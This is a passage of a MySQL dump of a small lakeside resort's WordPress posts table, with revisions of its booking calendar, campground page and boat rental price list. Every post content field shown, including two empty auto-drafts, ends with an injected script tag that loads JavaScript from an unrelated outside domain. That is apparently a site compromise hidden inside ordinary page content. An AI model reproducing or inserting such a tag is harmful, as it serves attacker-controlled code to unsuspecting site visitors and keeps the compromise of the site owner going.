"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-3\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\"],[\"S-4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-5\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-7\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"V-9\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 11\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 12\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 13\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2020-05-12 19:40:38','2020-05-13 00:40:38','',835,'https://ashbyresort.com/835-revision-v1/',0,'revision','',0),(945,3,'2020-06-15 08:58:04','2020-06-15 13:58:04','<p>Looking for a Campsite - <a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a>  WE ARE NOT ACCEPTING TENT CAMPING AT THIS TIME, DO TO NOT HAVING THE PUBLIC RESTROOMS AND SHOWER HOUSE OPEN.</p>		\n							<figure>\n										<img width=\"720\" height=\"540\" src=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872-1024x768.jpg\" alt=\"\" srcset=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872-1024x768.jpg 1024w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872-300x225.jpg 300w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											<figcaption>WE HAVE RV CAMPING 30 AMP SERVICE</figcaption>\n										</figure>\n							<figure>\n										<img width=\"720\" height=\"540\" src=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-1024x768.jpg\" alt=\"\" srcset=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-1024x768.jpg 1024w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-300x225.jpg 300w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											<figcaption>THERE ARE FULL HOOK UP 30 AMP SITES</figcaption>\n										</figure>\n							<figure>\n										<img width=\"720\" height=\"540\" src=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-1024x768.jpg\" alt=\"\" srcset=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-1024x768.jpg 1024w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-300x225.jpg 300w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											<figcaption>20 AMP SITES</figcaption>\n										</figure>\n										<img width=\"720\" height=\"540\" src=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-1024x768.jpg\" alt=\"\" srcset=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-1024x768.jpg 1024w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-300x225.jpg 300w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n							<figure>\n										<img width=\"720\" height=\"540\" src=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg\" alt=\"\" srcset=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg 1024w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-300x225.jpg 300w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											<figcaption>TENTING NO ELECTRIC SITES</figcaption>\n										</figure>\n										<img width=\"720\" height=\"540\" src=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-1024x768.jpg\" alt=\"\" srcset=\"https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-1024x768.jpg 1024w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-300x225.jpg 300w, https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<p>There is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring.</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Campgrounds','','inherit','closed','closed','','633-revision-v1','','','2020-06-15 08:58:04','2020-06-15 13:58:04','',633,'https://ashbyresort.com/633-revision-v1/',0,'revision','',0),(947,3,'2020-06-16 16:03:49','2020-06-16 21:03:49','[[\"\",\"20-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"27-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"18-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"25-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1-Aug\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\"],[\"K-1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-2\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-5\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-7\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"V-9\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 13\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 14\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2020-06-16 16:03:49','2020-06-16 21:03:49','',835,'https://ashbyresort.com/835-revision-v1/',0,'revision','',0),(948,1,'2020-06-20 11:03:56','0000-00-00 00:00:00','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Auto Draft','','auto-draft','open','open','','','','','2020-06-20 11:03:56','0000-00-00 00:00:00','',0,'https://ashbyresort.com/?p=948',0,'post','',0),(949,3,'2020-07-02 05:49:44','0000-00-00 00:00:00','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Auto Draft','','auto-draft','open','open','','','','','2020-07-02 05:49:44','0000-00-00 00:00:00','',0,'https://ashbyresort.com/?p=949',0,'post','',0),(950,3,'2020-07-02 05:53:33','2020-07-02 10:53:33','[[\"If Available\",\"Daily\",\"Weekly\",\"\"],[\"Paddle Boards, Paddle boat, Kayaks, Canoes\",\"FREE\",\"FREE\",\"\"],[\"Boat Lifts\",\"$20.00\",\"$100.00\",\"\"],[\"Boat Launching/Docking\",\"\",\"\",\"$10.00 One time Fee\"],[\"20\' Pontoon with 25 H.P. Motor\",\"$150.00\",\"$500.00\",\"Plus Gas\"],[\"14 ft Lund Boat and 15 HP Motor\",\"$50.00\",\"$250.00\",\"Plus Gas\"],[\"16 ft Pontoon with Bimini cover\",\"$250\",\"$800\",\"Plus Gas\"],[\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Equipment Rentals','','inherit','closed','closed','','692-revision-v1','','','2020-07-02 05:53:33','2020-07-02 10:53:33','',692,'https://ashbyresort.com/692-revision-v1/',0,'revision','',0),(951,3,'2020-07-02 05:55:11','2020-07-02 10:55:11','[[\"If Available\",\"Daily\",\"Weekly\",\"\"],[\"Paddle Boards, Paddle boat, Kayaks, Canoes\",\"FREE\",\"FREE\",\"\"],[\"Boat Lifts\",\"$20.00\",\"$100.00\",\"\"],[\"Boat Launching/Docking\",\"\",\"\",\"$10.00 One time Fee\"],[\"20\' Pontoon with 25 H.P. Motor\",\"$150.00\",\"$500.00\",\"Plus Gas\"],[\"14 ft Lund Boat and 15 HP Motor\",\"$50.00\",\"$250.00\",\"Plus Gas\"],[\"16 ft Pontoon with Bimini cover 40 HP Motor\",\"$250.00\",\"$800.00\",\"Plus Gas\"],[\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Equipment Rentals','','inherit','closed','closed','','692-revision-v1','','','2020-07-02 05:55:11','2020-07-02 10:55:11','',692,'https://ashbyresort.com/692-revision-v1/',0,'revision','',0),(952,3,'2020-07-24 20:57:56','2020-07-25 01:57:56','[[\"If Available\",\"Daily\",\"Weekly\",\"\"],[\"Paddle Boards, Paddle boat, Kayaks, Canoes\",\"FREE\",\"FREE\",\"\"],[\"Boat Lifts\",\"$20.00\",\"$100.00\",\"\"],[\"Boat Launching/Docking\",\"\",\"\",\"$10.00 One time Fee\"],[\"20\' Pontoon with 25 H.P. Motor\",\"$150.00\",\"$600.00\",\"Plus Gas\"],[\"14 ft Lund Boat and 15 HP Motor\",\"$50.00\",\"$250.00\",\"Plus Gas\"],[\"16 ft Pontoon with Bimini cover 40 HP Motor\",\"$250.00\",\"$1000.00\",\"Plus Gas\"],[\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Equipment Rentals','','inherit','closed','closed','','692-revision-v1','','','2020-07-24 20:57:56','2020-07-25 01:57:56','',692,'https://ashbyresort.com/692-revision-v1/',0,'revision','',0),(953,3,'2020-08-25 07:20:50','2020-08-25 12:20:50','[[\"\",\"22-Aug\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"29-Aug\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"19-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"26-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3-Oct\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\"],[\"K-1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-2\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-5\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"V-9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 10\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2020-08-25 07:20:50','2020-08-25 12:20:50','',835,'https://ashbyresort.com/835-revision-v1/',0,'revision','',0);
/*!40000 ALTER TABLE `ar_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_term_relationships`
--

DROP TABLE IF EXISTS `ar_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_term_relationships`
--

LOCK TABLES `ar_term_relationships` WRITE;
/*!40000 ALTER TABLE `ar_term_relationships` DISABLE KEYS */;
